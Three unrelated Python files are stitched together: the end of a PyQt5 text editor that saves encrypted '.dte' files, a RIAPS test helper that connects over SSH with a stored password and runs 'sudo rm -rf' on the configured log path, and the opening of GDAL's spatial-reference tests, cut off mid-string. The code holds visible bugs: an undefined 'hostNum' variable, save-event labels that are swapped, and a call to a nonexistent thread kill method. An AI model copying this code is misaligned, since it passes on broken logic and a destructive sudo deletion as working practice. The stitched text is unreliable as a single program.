QtWidgets.QAction(QtGui.QIcon("icons/highlight.png"),"Change background color",self) backColor.triggered.connect(self.highlight) self.formatbar = self.addToolBar("Format") 
self.formatbar.addWidget(fontBox) self.formatbar.addWidget(fontSize) self.formatbar.addSeparator() self.formatbar.addAction(fontColor) self.formatbar.addAction(backColor) self.formatbar.addSeparator() self.formatbar.addAction(boldAction) self.formatbar.addAction(italicAction) self.formatbar.addAction(underlAction) self.formatbar.addAction(strikeAction) self.formatbar.addAction(superAction) self.formatbar.addAction(subAction) self.formatbar.addSeparator() self.formatbar.addAction(alignLeft) self.formatbar.addAction(alignCenter) self.formatbar.addAction(alignRight) self.formatbar.addAction(alignJustify) self.formatbar.addSeparator() self.formatbar.addAction(indentAction) self.formatbar.addAction(dedentAction) def initMenubar(self): menubar = self.menuBar() file = menubar.addMenu("File") edit = menubar.addMenu("Edit") view = menubar.addMenu("View") # Add the most important actions to the menubar file.addAction(self.newAction) file.addAction(self.openAction) file.addAction(self.saveAction) file.addAction(self.printAction) file.addAction(self.previewAction) edit.addAction(self.undoAction) edit.addAction(self.redoAction) edit.addAction(self.cutAction) edit.addAction(self.copyAction) edit.addAction(self.pasteAction) edit.addAction(self.findAction) # Toggling actions for the various bars toolbarAction = QtWidgets.QAction("Toggle Toolbar",self) toolbarAction.triggered.connect(self.toggleToolbar) formatbarAction = QtWidgets.QAction("Toggle Formatbar",self) formatbarAction.triggered.connect(self.toggleFormatbar) statusbarAction = QtWidgets.QAction("Toggle Statusbar",self) statusbarAction.triggered.connect(self.toggleStatusbar) view.addAction(toolbarAction) view.addAction(formatbarAction) view.addAction(statusbarAction) def initUI(self): self.text = QtWidgets.QTextEdit(self) # self.fileid = None # Set the tab stop width to around 33 pixels which is # more or less 8 spaces self.text.setTabStopWidth(33) self.initToolbar() self.initFormatbar() self.initMenubar() 
self.setCentralWidget(self.text) # Initialize a statusbar for the window self.statusbar = self.statusBar() # If the cursor position changes, call the function that displays # the line and column number self.text.cursorPositionChanged.connect(self.cursorPosition) # We need our own context menu for tables self.text.setContextMenuPolicy(Qt.CustomContextMenu) self.text.customContextMenuRequested.connect(self.context) self.text.textChanged.connect(self.changed) self.setGeometry(100,100,1030,800) self.setWindowTitle("Writer") self.setWindowIcon(QtGui.QIcon("icons/icon.png")) def changed(self): self.changesSaved = False def closeEvent(self,event): if self.changesSaved: event.accept() else: popup = QtWidgets.QMessageBox(self) popup.setIcon(QtWidgets.QMessageBox.Warning) popup.setText("The document has been modified") popup.setInformativeText("Do you want to save your changes?") popup.setStandardButtons(QtWidgets.QMessageBox.Save | QtWidgets.QMessageBox.Cancel | QtWidgets.QMessageBox.Discard) popup.setDefaultButton(QtWidgets.QMessageBox.Save) answer = popup.exec_() if answer == QtWidgets.QMessageBox.Save: self.save() elif answer == QtWidgets.QMessageBox.Discard: event.accept() else: event.ignore() def context(self,pos): # Grab the cursor cursor = self.text.textCursor() # Grab the current table, if there is one table = cursor.currentTable() # Above will return 0 if there is no current table, in which case # we call the normal context menu. 
If there is a table, we create # our own context menu specific to table interaction if table: menu = QtGui.QMenu(self) appendRowAction = QtWidgets.QAction("Append row",self) appendRowAction.triggered.connect(lambda: table.appendRows(1)) appendColAction = QtWidgets.QAction("Append column",self) appendColAction.triggered.connect(lambda: table.appendColumns(1)) removeRowAction = QtWidgets.QAction("Remove row",self) removeRowAction.triggered.connect(self.removeRow) removeColAction = QtWidgets.QAction("Remove column",self) removeColAction.triggered.connect(self.removeCol) insertRowAction = QtWidgets.QAction("Insert row",self) insertRowAction.triggered.connect(self.insertRow) insertColAction = QtWidgets.QAction("Insert column",self) insertColAction.triggered.connect(self.insertCol) mergeAction = QtWidgets.QAction("Merge cells",self) mergeAction.triggered.connect(lambda: table.mergeCells(cursor)) # Only allow merging if there is a selection if not cursor.hasSelection(): mergeAction.setEnabled(False) splitAction = QtWidgets.QAction("Split cells",self) cell = table.cellAt(cursor) # Only allow splitting if the current cell is larger # than a normal cell if cell.rowSpan() > 1 or cell.columnSpan() > 1: splitAction.triggered.connect(lambda: table.splitCell(cell.row(),cell.column(),1,1)) else: splitAction.setEnabled(False) menu.addAction(appendRowAction) menu.addAction(appendColAction) menu.addSeparator() menu.addAction(removeRowAction) menu.addAction(removeColAction) menu.addSeparator() menu.addAction(insertRowAction) menu.addAction(insertColAction) menu.addSeparator() menu.addAction(mergeAction) menu.addAction(splitAction) # Convert the widget coordinates into global coordinates pos = self.mapToGlobal(pos) # Add pixels for the tool and formatbars, which are not included # in mapToGlobal(), but only if the two are currently visible and # not toggled by the user if self.toolbar.isVisible(): pos.setY(pos.y() + 45) if self.formatbar.isVisible(): pos.setY(pos.y() + 45) # Move the 
menu to the new position menu.move(pos) menu.show() else: event = QtGui.QContextMenuEvent(QtGui.QContextMenuEvent.Mouse,QtCore.QPoint()) self.text.contextMenuEvent(event) def removeRow(self): # Grab the cursor cursor = self.text.textCursor() # Grab the current table (we assume there is one, since # this is checked before calling) table = cursor.currentTable() # Get the current cell cell = table.cellAt(cursor) # Delete the cell's row table.removeRows(cell.row(),1) def removeCol(self): # Grab the cursor cursor = self.text.textCursor() # Grab the current table (we assume there is one, since # this is checked before calling) table = cursor.currentTable() # Get the current cell cell = table.cellAt(cursor) # Delete the cell's column table.removeColumns(cell.column(),1) def insertRow(self): # Grab the cursor cursor = self.text.textCursor() # Grab the current table (we assume there is one, since # this is checked before calling) table = cursor.currentTable() # Get the current cell cell = table.cellAt(cursor) # Insert a new row at the cell's position table.insertRows(cell.row(),1) def insertCol(self): # Grab the cursor cursor = self.text.textCursor() # Grab the current table (we assume there is one, since # this is checked before calling) table = cursor.currentTable() # Get the current cell cell = table.cellAt(cursor) # Insert a new row at the cell's position table.insertColumns(cell.column(),1) def toggleToolbar(self): state = self.toolbar.isVisible() # Set the visibility to its inverse self.toolbar.setVisible(not state) def toggleFormatbar(self): state = self.formatbar.isVisible() # Set the visibility to its inverse self.formatbar.setVisible(not state) def toggleStatusbar(self): state = self.statusbar.isVisible() # Set the visibility to its inverse self.statusbar.setVisible(not state) def new(self): spawn = Main() spawn.show() def open(self): # Get filename and show only .writer files #PYQT5 Returns a tuple in PyQt5, we only need the filename self.filename = 
QtWidgets.QFileDialog.getOpenFileName(self, 'Open File',".","(*.dte)")[0] if self.filename: with open(self.filename,"rb") as file: fd = dte_decrypt(file.read()) soup = BeautifulSoup(fd,"lxml") if soup.head: if soup.head.fileid: self.fileid = soup.head.fileid.text else: self.fileid = generateFileId() self.text.setText(fd) eventRegister(self.fileid,'Opened') def save(self): # Only open dialog if there is no filename yet #PYQT5 Returns a tuple in PyQt5, we only need the filename if not self.filename: self.filename = QtWidgets.QFileDialog.getSaveFileName(self, 'Save File')[0] if self.filename: # Append extension if not there yet if not self.filename.endswith(".dte"): self.filename += ".dte" # We just store the contents of the text file along with the # format in html, which Qt does in a very nice way for us event_state = '' if not self.fileid: event_state = 'Modified' self.fileid = generateFileId() else: event_state = 'Created' print('file id available') with open(self.filename,"wb") as file: file_content=self.text.toHtml().replace("<head>","<head><fileid>"+self.fileid+"</fileid>") file.write(dte_encrypt(file_content)) self.changesSaved = True eventRegister(self.fileid,event_state) def preview(self): # Open preview dialog preview = QtPrintSupport.QPrintPreviewDialog() # If a print is requested, open print dialog preview.paintRequested.connect(lambda p: self.text.print_(p)) preview.exec_() def printHandler(self): # Open printing dialog dialog = QtPrintSupport.QPrintDialog() if dialog.exec_() == QtWidgets.QDialog.Accepted: self.text.document().print_(dialog.printer()) def cursorPosition(self): cursor = self.text.textCursor() # Mortals like 1-indexed things line = cursor.blockNumber() + 1 col = cursor.columnNumber() self.statusbar.showMessage("Line: {} | Column: {}".format(line,col)) def wordCount(self): wc = wordcount.WordCount(self) wc.getText() wc.show() def insertImage(self): # Get image file name #PYQT5 Returns a tuple in PyQt5 filename = 
QtWidgets.QFileDialog.getOpenFileName(self, 'Insert image',".","Images (*.png *.xpm *.jpg *.bmp *.gif)")[0] if filename: # Create image object image = QtGui.QImage(filename) # Error if unloadable if image.isNull(): popup = QtWidgets.QMessageBox(QtWidgets.QMessageBox.Critical, "Image load error", "Could not load image file!", QtWidgets.QMessageBox.Ok, self) popup.show() else: cursor = self.text.textCursor() cursor.insertImage(image,filename) def fontColorChanged(self): # Get a color from the text dialog color = QtWidgets.QColorDialog.getColor() # Set it as the new text color self.text.setTextColor(color) def highlight(self): color = QtWidgets.QColorDialog.getColor() self.text.setTextBackgroundColor(color) def bold(self): if self.text.fontWeight() == QtGui.QFont.Bold: self.text.setFontWeight(QtGui.QFont.Normal) else: self.text.setFontWeight(QtGui.QFont.Bold) def italic(self): state = self.text.fontItalic() self.text.setFontItalic(not state) def underline(self): state = self.text.fontUnderline() self.text.setFontUnderline(not state) def strike(self): # Grab the text's format fmt = self.text.currentCharFormat() # Set the fontStrikeOut property to its opposite fmt.setFontStrikeOut(not fmt.fontStrikeOut()) # And set the next char format self.text.setCurrentCharFormat(fmt) def superScript(self): # Grab the current format fmt = self.text.currentCharFormat() # And get the vertical alignment property align = fmt.verticalAlignment() # Toggle the state if align == QtGui.QTextCharFormat.AlignNormal: fmt.setVerticalAlignment(QtGui.QTextCharFormat.AlignSuperScript) else: fmt.setVerticalAlignment(QtGui.QTextCharFormat.AlignNormal) # Set the new format self.text.setCurrentCharFormat(fmt) def subScript(self): # Grab the current format fmt = self.text.currentCharFormat() # And get the vertical alignment property align = fmt.verticalAlignment() # Toggle the state if align == QtGui.QTextCharFormat.AlignNormal: fmt.setVerticalAlignment(QtGui.QTextCharFormat.AlignSubScript) else: 
fmt.setVerticalAlignment(QtGui.QTextCharFormat.AlignNormal) # Set the new format self.text.setCurrentCharFormat(fmt) def alignLeft(self): self.text.setAlignment(Qt.AlignLeft) def alignRight(self): self.text.setAlignment(Qt.AlignRight) def alignCenter(self): self.text.setAlignment(Qt.AlignCenter) def alignJustify(self): self.text.setAlignment(Qt.AlignJustify) def indent(self): # Grab the cursor cursor = self.text.textCursor() if cursor.hasSelection(): # Store the current line/block number temp = cursor.blockNumber() # Move to the selection's end cursor.setPosition(cursor.anchor()) # Calculate range of selection diff = cursor.blockNumber() - temp direction = QtGui.QTextCursor.Up if diff > 0 else QtGui.QTextCursor.Down # Iterate over lines (diff absolute value) for n in range(abs(diff) + 1): # Move to start of each line cursor.movePosition(QtGui.QTextCursor.StartOfLine) # Insert tabbing cursor.insertText("\t") # And move back up cursor.movePosition(direction) # If there is no selection, just insert a tab else: cursor.insertText("\t") def handleDedent(self,cursor): cursor.movePosition(QtGui.QTextCursor.StartOfLine) # Grab the current line line = cursor.block().text() # If the line starts with a tab character, delete it if line.startswith("\t"): # Delete next character cursor.deleteChar() # Otherwise, delete all spaces until a non-space character is met else: for char in line[:8]: if char != " ": break cursor.deleteChar() def dedent(self): cursor = self.text.textCursor() if cursor.hasSelection(): # Store the current line/block number temp = cursor.blockNumber() # Move to the selection's last line cursor.setPosition(cursor.anchor()) # Calculate range of selection diff = cursor.blockNumber() - temp direction = QtGui.QTextCursor.Up if diff > 0 else QtGui.QTextCursor.Down # Iterate over lines for n in range(abs(diff) + 1): self.handleDedent(cursor) # Move up cursor.movePosition(direction) else: self.handleDedent(cursor) def bulletList(self): cursor = self.text.textCursor() 
# Insert bulleted list cursor.insertList(QtGui.QTextListFormat.ListDisc) def numberList(self): cursor = self.text.textCursor() # Insert list with numbers cursor.insertList(QtGui.QTextListFormat.ListDecimal) def main(): app = QtWidgets.QApplication(sys.argv) sync_events = threading.Thread(target=db_update) main = Main() if is_connected("www.google.com"): #sync_events.daemon=False #sync_events.start() print("Syncing Events thread has start") main.show() else: print("Network issue!! Please connect to internet and try") main.show() sys.exit(app.exec_()) print("System Closed") sync_events.kill() print("Syncing closed") if __name__ == "__main__": main()
riaps_testing.py
"""RIAPS testing helper methods """ import os import sys import yaml import paramiko import zmq import time import threading import datetime stream = open('riaps_testing_config.yml', 'r') config = yaml.load(stream, Loader=yaml.SafeLoader) stream.close() for key in {"hosts", "username", "password", "logPath", "logPrefix"}: assert key in config, "Failed to find '%s' in configuration file" % key # Configure SSH client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) #Create ZMQ context ctx = zmq.Context() def parseString(str, name): """Replace keywords in string (commonly the contents of a file) This is a helper method for the runTest(...) method. It will automatically replace any keywords with the appropriate strings to automate testing. Args: str (str): The string in which to replace keywords name (str): The name of the RIAPS application Returns: (str, int): The newly parsed string and the number of hosts required for running the test. """ str = str.replace("NAME", name) num_hosts = 0 while str.find("HOST") != -1: assert num_hosts < len(config['hosts']), "More hosts required than provided" # Replace the first instance of HOST with the next available host str = str.replace("HOST", config['hosts'][num_hosts], 1) num_hosts += 1 return (str, num_hosts) def powerCycleControl(hostname, events): sock = ctx.socket(zmq.REQ) sock.connect('tcp://'+config['hosts'][hostNum]+':2234') msg = ('power',1) #second field is arbitrary for now, there in case one node could turn off multiple others for timediff in events: time.sleep(timediff) sock.send_pyobj(msg) assert sock.recv_pyobj() == 'Powercycle sent', "Powercycle failed for timediff: %d" % timediff def runTest(name, folder, riaps, depl, startupTime=300, runTime=60, cleanupTime=120, powerTiming=None): """Run a RIAPS application on BBB hosts Args: name (str): The name of RIAPS application folder (str): Path to the folder containing the riaps and depl files riaps (str): Name of the riaps file 
containing the application model depl (str): Name of the depl file containing the application deployment startupTime (int, optional): Time to wait for nodes to connect to riaps_ctrl. Defaults to 10 seconds. runTime (int, optional): Time to let application run. Defaults to 30 seconds. cleanupTime (int, optional): Time to wait after halting the application. Defaults to 10 seconds. powerTiming (dic, optional): An (int):(list) dict of timing to cycle power on nodes. The key is which index in the list of configured hosts (starting from zero) is sending the power signal. The list is the amount of time slept (secs) between power signals being sent, starting concurrently with riaps_ctrl. Returns: dictionary: A dictionary where the keys are the names of the log files collected. Each element is a a list of strings representing the lines of the log file. Raises: AssertionError: Raised if any invalid arguments are passed or if a test fails. """ # Verify that arguments point to valid files assert name != "" and not (' ' in name), "Invalid test name: %s" % name assert os.path.isdir(os.path.join(folder)), "Failed to find test folder: %s" % folder assert os.path.isfile(os.path.join(folder, riaps)), "Failed to find test riaps file: %s" % riaps assert os.path.isfile(os.path.join(folder, depl)), "Failed to find depl file: %s" % depl # Force folder to be an absolute path if not os.path.isabs(folder): folder = os.path.join(os.getcwd(), folder) # Verify that all hosts are accessible for host in config['hosts']: print("Verifying connection to %s" % host) try: client.connect(host, username=config['username'], password=config['password']) # Remove any existing logs in the logPath client.exec_command("sudo rm -rf %s" % os.path.join(config['logPath'], config['logPrefix'])) except: assert False, "Failed to connect host: %s" % host finally: client.close() # Read the provided riaps and depl files file = open(os.path.join(folder, riaps), "r") model = file.read() file.close() file = 
open(os.path.join(folder, depl), "r") deployment = file.read() file.close() # Parse files model, num_hosts = parseString(model, name) deployment, num_hosts = parseString(deployment, name) # Write parsed files file = open(os.path.join(folder, "test.riaps"), "w") file.write(model) file.close() file = open(os.path.join(folder, "test.depl"), "w") file.write(deployment) file.close() # Create test.rc file file = open("test.rc", "w") file.write("w %d\n" % startupTime) file.write("f %s\n" % folder) file.write("m test.riaps\n") file.write("d test.depl\n") file.write("l %s\n" % name) file.write("w %d\n" % runTime) file.write("h %s\n" % name) file.write("w %s\n" % cleanupTime) file.write("r %s\n" % name) file.write("w %s\n" % cleanupTime) file.write("q\n") file.close() if powerTiming is not None: threadPool = [] for key in powerTiming: threadPool.append(threading.Thread(target=powerCycleControl,args=(key,powerTiming[key]))) for thread in threadPool: thread.start() start_time = datetime.datetime.now() # Launch riaps_ctrl assert os.system("riaps_ctrl test.rc") == 0, "Error while running riaps_ctrl" if powerTiming is not None: for thread in threadPool: thread.join(timeout=1.0) assert thread.is_alive() == False, "A powerCycleControl thread failed to close!" 
# Collect logs logs = {} for i in range(num_hosts): host = config['hosts'][i] print("Collecting logs from %s" % host) try: # Find all log files on the target host client.connect(host, username=config['username'], password=config['password']) # Collect journalctl logs since = start_time.strftime('%Y-%m-%d %H:%M:%S') stdin, stdout, stderr = client.exec_command("sudo journalctl -u riaps-deplo --since '%s'" % since) print('\nJournalctl from %s' % host) for line in stdout: print(line.strip('\n')) # Collect client logs stdin, stdout, stderr = client.exec_command("ls %s" % os.path.join(config['logPath'], config['logPrefix'])) for line in stderr: print(line.strip('\n')) for logfile in stdout: logfile = logfile.strip('\n') print("\nFound logfile on %s named %s" % (host, logfile)) stdin2, stdout2, stderr2 = client.exec_command("cat %s" % os.path.join(config['logPath'], logfile)) log = [] for line in stdout2: line = line.strip('\n') print(line) log.append(line) logs["%d_%s" % (i, logfile)] = log except: assert False, "Failed to retrieve logs from host: %s" % host finally: client.close() return logs
osr_basic.py
#!/usr/bin/env pytest # -*- coding: utf-8 -*- ############################################################################### # $Id$ # # Project: GDAL/OGR Test Suite # Purpose: Basic tests of OGRSpatialReference (OSR) operation, not including # support for actual reprojection or use of EPSG tables. # Author: Frank Warmerdam <warmerdam@pobox.com> # ############################################################################### # Copyright (c) 2003, Frank Warmerdam <warmerdam@pobox.com> # Copyright (c) 2008-2013, Even Rouault <even dot rouault at spatialys.com> # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. ############################################################################### import gdaltest from osgeo import osr import pytest from threading import Thread ############################################################################### # Create a UTM WGS84 coordinate system and check various items. 
def test_osr_basic_1():
    """UTM WGS84: zone sign encodes hemisphere; check parameters and codes."""
    utm_srs = osr.SpatialReference()
    # Southern hemisphere
    utm_srs.SetUTM(11, 0)
    utm_srs.SetWellKnownGeogCS('WGS84')

    assert utm_srs.GetUTMZone() == -11

    # Northern hemisphere
    utm_srs.SetUTM(11)

    assert utm_srs.GetUTMZone() == 11

    parm_list = \
        [(osr.SRS_PP_CENTRAL_MERIDIAN, -117.0),
         (osr.SRS_PP_LATITUDE_OF_ORIGIN, 0.0),
         (osr.SRS_PP_SCALE_FACTOR, 0.9996),
         (osr.SRS_PP_FALSE_EASTING, 500000.0),
         (osr.SRS_PP_FALSE_NORTHING, 0.0)]

    for parm in parm_list:
        value = utm_srs.GetProjParm(parm[0], -1111)
        assert value == pytest.approx(parm[1], abs=.00000000000010), \
            ('got %g for %s instead of %g.' % (value, parm[0], parm[1]))

    auth_list = [('GEOGCS', '4326'),
                 ('DATUM', '6326')]

    for auth in auth_list:
        assert utm_srs.GetAuthorityName(auth[0]) == 'EPSG', \
            ('Got authority %s instead of EPSG for %s' % (utm_srs.GetAuthorityName(auth[0]), auth[0]))

        # BUG FIX: the failure message previously interpolated
        # GetAuthorityName() where the mismatching code was meant
        # (compare with test_osr_basic_2 below).
        assert str(utm_srs.GetAuthorityCode(auth[0])) == auth[1], \
            ('Got code %s instead of %s for %s' % (utm_srs.GetAuthorityCode(auth[0]), auth[1], auth[0]))

###############################################################################
# Simple default NAD83 State Plane zone.


def test_osr_basic_2():
    """Default NAD83 State Plane zone 403 (California III)."""
    srs = osr.SpatialReference()
    srs.SetStatePlane(403, 1)  # California III NAD83.

    parm_list = \
        [(osr.SRS_PP_STANDARD_PARALLEL_1, 38.43333333333333),
         (osr.SRS_PP_STANDARD_PARALLEL_2, 37.06666666666667),
         (osr.SRS_PP_LATITUDE_OF_ORIGIN, 36.5),
         (osr.SRS_PP_CENTRAL_MERIDIAN, -120.5),
         (osr.SRS_PP_FALSE_EASTING, 2000000.0),
         (osr.SRS_PP_FALSE_NORTHING, 500000.0)]

    for parm in parm_list:
        value = srs.GetProjParm(parm[0], -1111)
        assert gdaltest.approx_equal(parm[1], value), \
            ('got %.16g for %s instead of %.16g.' % (value, parm[0], parm[1]))

    auth_list = [('GEOGCS', '4269'),
                 ('DATUM', '6269'),
                 ('PROJCS', '26943'),
                 ('PROJCS|UNIT', '9001')]

    for auth in auth_list:
        assert srs.GetAuthorityName(auth[0]) == 'EPSG', \
            ('Got authority %s instead of EPSG for %s' % (srs.GetAuthorityName(auth[0]), auth[0]))

        assert str(srs.GetAuthorityCode(auth[0])) == auth[1], \
            ('Got code %s instead of %s for %s' % (srs.GetAuthorityCode(auth[0]), auth[1], auth[0]))

###############################################################################
# NAD83 State Plane zone, but overridden to be in Feet.


def test_osr_basic_3():
    """State Plane zone with linear units overridden to Feet: the unit
    override must drop the EPSG PROJCS authority and rescale offsets."""
    srs = osr.SpatialReference()

    # California III NAD83 (feet)
    srs.SetStatePlane(403, 1, 'Foot', 0.3048006096012192)
    # print srs.ExportToPrettyWkt()

    parm_list = \
        [(osr.SRS_PP_STANDARD_PARALLEL_1, 38.43333333333333),
         (osr.SRS_PP_STANDARD_PARALLEL_2, 37.06666666666667),
         (osr.SRS_PP_LATITUDE_OF_ORIGIN, 36.5),
         (osr.SRS_PP_CENTRAL_MERIDIAN, -120.5),
         (osr.SRS_PP_FALSE_EASTING, 6561666.666666667),
         (osr.SRS_PP_FALSE_NORTHING, 1640416.666666667)]

    for parm in parm_list:
        value = srs.GetProjParm(parm[0], -1111)
        assert gdaltest.approx_equal(parm[1], value), \
            ('got %.16g for %s instead of %.16g.' % (value, parm[0], parm[1]))

    auth_list = [('GEOGCS', '4269'),
                 ('DATUM', '6269')]

    for auth in auth_list:
        assert srs.GetAuthorityName(auth[0]) == 'EPSG', \
            ('Got authority %s instead of EPSG for %s' % (srs.GetAuthorityName(auth[0]), auth[0]))

        assert str(srs.GetAuthorityCode(auth[0])) == auth[1], \
            ('Got code %s instead of %s for %s' % (srs.GetAuthorityCode(auth[0]), auth[1], auth[0]))

    assert srs.GetAuthorityName('PROJCS') is None, 'Got a PROJCS Authority but we should not'

    assert str(srs.GetAuthorityCode('PROJCS|UNIT')) != '9001', \
        'Got METER authority code on linear units.'

    assert srs.GetLinearUnitsName() == 'Foot', 'Didnt get Foot linear units'

    assert srs.GetLinearUnits() == pytest.approx(0.3048006096012192, 1e-16)

    assert srs.GetTargetLinearUnits('PROJCS') == pytest.approx(0.3048006096012192, 1e-16)

    assert srs.GetTargetLinearUnits(None) == pytest.approx(0.3048006096012192, 1e-16)

###############################################################################
# Translate a coordinate system with nad shift into to PROJ.4 and back
# and verify that the TOWGS84 parameters are preserved.


def test_osr_basic_4():
    """TOWGS84 parameters must survive a round trip through PROJ.4."""
    srs = osr.SpatialReference()
    srs.SetGS(cm=-117.0, fe=100000.0, fn=100000)
    srs.SetLinearUnits('meter', 1)
    srs.SetGeogCS('Test GCS', 'Test Datum', 'WGS84',
                  osr.SRS_WGS84_SEMIMAJOR, osr.SRS_WGS84_INVFLATTENING)

    srs.SetTOWGS84(1, 2, 3)

    assert srs.GetTOWGS84() == (1, 2, 3, 0, 0, 0, 0), 'GetTOWGS84() result is wrong.'

    proj4 = srs.ExportToProj4()

    srs2 = osr.SpatialReference()
    srs2.ImportFromProj4(proj4)

    assert srs2.GetTOWGS84() == (1, 2, 3, 0, 0, 0, 0), \
        'GetTOWGS84() result is wrong after PROJ.4 conversion.'

###############################################################################
# Test URN support for OGC:CRS84.
def test_osr_basic_5(): wkt_1 = osr.GetUserInputAsWKT('urn:ogc:def:crs:OGC:1.3:CRS84') wkt_2 = osr.GetUserInputAsWKT('WGS84') assert wkt_1 == 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AXIS["Longitude",EAST],AXIS["Latitude",NORTH]]' assert wkt_2 == 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AXIS["Latitude",NORTH],AXIS["Longitude",EAST],AUTHORITY["EPSG","4326"]]' ############################################################################### # Test URN support for EPSG def test_osr_basic_6(): # Without version wkt_1 = osr.GetUserInputAsWKT('urn:x-ogc:def:crs:EPSG::4326') assert not (wkt_1.find('GEOGCS["WGS 84",DATUM["WGS_1984"') == -1 or wkt_1.find('AXIS["Latitude",NORTH],AXIS["Longitude",EAST]') == -1), \ 'EPSG:4326 urn lookup not as expected.' # With a version wkt_2 = osr.GetUserInputAsWKT('urn:x-ogc:def:crs:EPSG:6.6:4326') if wkt_2.find('GEOGCS["WGS 84",DATUM["WGS_1984"') == -1 or wkt_2.find('AXIS["Latitude",NORTH],AXIS["Longitude",EAST]') == -1: print(wkt_1) pytest.fail('EPSG:4326 urn lookup not as expected.') # Without version, but with no repeated :. Probably illegal from my understanding # of http://www.opengeospatial.org/ogcUrnPolicy, but found quite often in the wild # especially in content returned by GeoServer wkt_2 = osr.GetUserInputAsWKT('urn:x-ogc:def:crs:EPSG:4326') if wkt_2.find('GEOGCS["WGS 84",DATUM["WGS_1984"') == -1 or wkt_2.find('AXIS["Latitude",NORTH],AXIS["Longitude",EAST]') == -1: print(wkt_1) pytest.fail('EPSG:4326 urn lookup not as expected.') ############################################################################### # Test URN support for auto projection. 
def test_osr_basic_7(): wkt = osr.GetUserInputAsWKT('urn:ogc:def:crs:OGC::AUTO42001:-117:33') assert wkt.find('GEOGCS["WGS 84"') > 0 and wkt.find('PROJECTION["Transverse_Mercator"],PARAMETER["latitude_of_origin",0],PARAMETER["central_meridian",-117],PARAMETER["scale_factor",0.9996],PARAMETER["false_easting",500000],PARAMETER["false_northing",0],UNIT["Meter",1,AUTHORITY["EPSG","9001"]],AXIS["Easting",EAST],AXIS["Northing",NORTH]') > 0, 'AUTO42001 urn lookup not as expected.' ############################################################################### # Test the SetLinearUnitsAndUpdateParameters() method. def test_osr_basic_8(): srs = osr.SpatialReference() srs.SetFromUserInput('+proj=tmerc +x_0=1000 +datum=WGS84 +units=m') srs.SetLinearUnits('Foot', 0.3048) fe = srs.GetProjParm('false_easting') assert fe == 1000.0, 'false easting was unexpectedly updated.' srs.SetFromUserInput('+proj=tmerc +x_0=1000 +datum=WGS84 +units=m') srs.SetLinearUnitsAndUpdateParameters('Foot', 0.3048) fe = srs.GetProjParm('false_easting') assert fe != 1000.0, 'false easting was unexpectedly not updated.' assert fe == pytest.approx(3280.840, abs=0.01), 'wrong updated false easting value.' ############################################################################### # Test the Validate() method. 
def test_osr_basic_9():
    """Validate() must accept a PROJCS carrying a PROJ4 EXTENSION node."""
    srs = osr.SpatialReference()
    srs.SetFromUserInput("PROJCS[\"unnamed\",GEOGCS[\"unnamed ellipse\",DATUM[\"unknown\",SPHEROID[\"unnamed\",6378137,0]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433]],PROJECTION[\"Mercator_2SP\"],PARAMETER[\"standard_parallel_1\",0],PARAMETER[\"latitude_of_origin\",0],PARAMETER[\"central_meridian\",0],PARAMETER[\"false_easting\",0],PARAMETER[\"false_northing\",0],UNIT[\"Meter\",1],EXTENSION[\"PROJ4\",\"+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +wktext +no_defs\"]]")

    assert srs.Validate() == 0

###############################################################################
# Test the Validate() method on PROJCS with AXIS definition (#2739)


def test_osr_basic_10():
    """Validate() must accept a PROJCS containing AXIS nodes (#2739)."""
    srs = osr.SpatialReference()
    srs.SetFromUserInput("""PROJCS["NAD83(CSRS98) / UTM zone 20N (deprecated)",
    GEOGCS["NAD83(CSRS98)",
        DATUM["NAD83_Canadian_Spatial_Reference_System",
            SPHEROID["GRS 1980",6378137,298.257222101,
                AUTHORITY["EPSG","7019"]],
            TOWGS84[0,0,0,0,0,0,0],
            AUTHORITY["EPSG","6140"]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433,
            AUTHORITY["EPSG","9108"]],
        AUTHORITY["EPSG","4140"]],
    PROJECTION["Transverse_Mercator"],
    PARAMETER["latitude_of_origin",0],
    PARAMETER["central_meridian",-63],
    PARAMETER["scale_factor",0.9996],
    PARAMETER["false_easting",500000],
    PARAMETER["false_northing",0],
    UNIT["metre",1,
        AUTHORITY["EPSG","9001"]],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH],
    AUTHORITY["EPSG","2038"]]""")

    assert srs.Validate() == 0

###############################################################################
# Test the IsSame() method (and the IsSameGeogCS() method through that)


def test_osr_basic_11():
    """IsSame() must treat an omitted latitude_of_origin=0 as equivalent to
    an explicit one (srs2 drops that PARAMETER relative to srs1)."""
    srs1 = osr.SpatialReference()
    srs1.SetFromUserInput("""PROJCS["NAD83(CSRS98) / UTM zone 20N (deprecated)",
    GEOGCS["NAD83(CSRS98)",
        DATUM["NAD83_Canadian_Spatial_Reference_System",
            SPHEROID["GRS 1980",6378137,298.257222101,
                AUTHORITY["EPSG","7019"]],
